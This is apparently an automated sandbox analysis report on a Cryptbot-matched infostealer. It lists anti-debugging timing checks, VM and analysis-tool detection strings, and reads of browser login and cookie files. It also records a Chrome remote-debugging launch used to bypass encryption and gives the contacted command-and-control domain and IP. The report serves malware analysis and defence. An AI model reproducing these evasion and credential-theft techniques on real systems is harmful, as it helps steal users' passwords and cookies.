Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500696 second address: 750069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 750069A second address: 75006CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA278C27B7Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA278C27B87h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75006CB second address: 7500738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Fh 0x00000009 add ecx, 5CED668Eh 0x0000000f jmp 00007FA278C0D029h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FA278C0D01Fh 0x00000023 or cx, 849Eh 0x00000028 jmp 00007FA278C0D029h 0x0000002d popfd 0x0000002e push esi 0x0000002f pop edi 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500738 second address: 7500754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B88h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500AA7 second address: 7500AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA278C0D023h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500AC0 second address: 7500B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA278C27B84h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FA278C27B7Eh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov bl, ah 0x00000018 pushfd 0x00000019 jmp 00007FA278C27B83h 0x0000001e sub esi, 09F1405Eh 0x00000024 jmp 00007FA278C27B89h 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B2D second address: 7500B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B40 second address: 7500B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B46 second address: 7500B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C0D025h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B6F second address: 7500B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500B75 second address: 7500B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 755096E second address: 7550974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550974 second address: 7550978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550978 second address: 7550993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov bl, 61h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550993 second address: 75509D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Fh 0x00000009 sbb ecx, 5A54B83Eh 0x0000000f jmp 00007FA278C0D029h 0x00000014 popfd 0x00000015 mov bh, ah 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509D2 second address: 75509D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509D6 second address: 75509DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509DC second address: 75509ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75509ED second address: 7550A0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7550A0B second address: 7550A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 12057C5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 13A55E9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 13A3D71 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Special instruction interceptor: First address: 142EF7E instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1496 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 918 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1447 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 1464 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Window / User API: threadDelayed 899 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 3491 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 6508 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 4.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7800 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7772 Thread sleep time: -2993496s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7780 Thread sleep time: -1836918s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7960 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7796 Thread sleep time: -2895447s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7776 Thread sleep time: -2929464s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe TID: 7792 Thread sleep time: -1798899s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep count: 3491 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep time: -349100s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep count: 6508 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5856 Thread sleep time: -650800s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: Amcache.hve.15.dr Binary or memory string: VMware
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.15.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.15.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr Binary or memory string: vmci.sys
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.15.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: kFrGefsAK3.exe, 00000001.00000003.1364414079.0000000001CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: chrome.exe, 00000004.00000002.1756017903.0000024F243C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyylZP
Source: Amcache.hve.15.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.15.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.15.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\kFrGefsAK3.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: NTICE
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: SICE
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A981E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 16_2_00A981E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A9116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 16_2_00A9116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A911A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 16_2_00A911A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A91160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 16_2_00A91160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A913C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 16_2_00A913C9
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: msmpeng.exe
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Leaks process information
Source: global traffic TCP traffic: 192.168.2.7:49706 -> 185.121.15.192:80
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579767 Sample: kFrGefsAK3.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 8 other signatures 2->55 7 kFrGefsAK3.exe 5 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        16 4 other processes 2->16 process3 dnsIp4 41 fivetk5sb.top 185.121.15.192, 49706, 49717, 49773 REDSERVICIOES Spain 7->41 43 httpbin.org 34.226.108.155, 443, 49700 AMAZON-AESUS United States 7->43 45 2 other IPs or domains 7->45 35 C:\Users\user\AppData\...\service123.exe, PE32 7->35 dropped 37 C:\Users\user\...\CaHNbeclRGcBxNSvHjFX.dll, PE32 7->37 dropped 57 Attempt to bypass Chrome Application-Bound Encryption 7->57 59 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->61 63 8 other signatures 7->63 18 WerFault.exe 21 16 7->18         started        21 chrome.exe 7->21         started        24 schtasks.exe 1 7->24         started        26 service123.exe 7->26         started        file5 signatures6 process7 dnsIp8 33 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->33 dropped 39 239.255.255.250 unknown Reserved 21->39 28 chrome.exe 21->28         started        31 conhost.exe 24->31         started        file9 process10 dnsIp11 47 www.google.com 142.250.181.132, 443, 49796, 49804 GOOGLEUS United States 28->47
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.121.15.192
 home.fivetk5sb.top Spain
207046 REDSERVICIOES false
34.226.108.155
 httpbin.org United States
14618 AMAZON-AESUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.181.132
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fivetk5sb.top 185.121.15.192 true
www.google.com 142.250.181.132 true
fivetk5sb.top 185.121.15.192 true
httpbin.org 34.226.108.155 true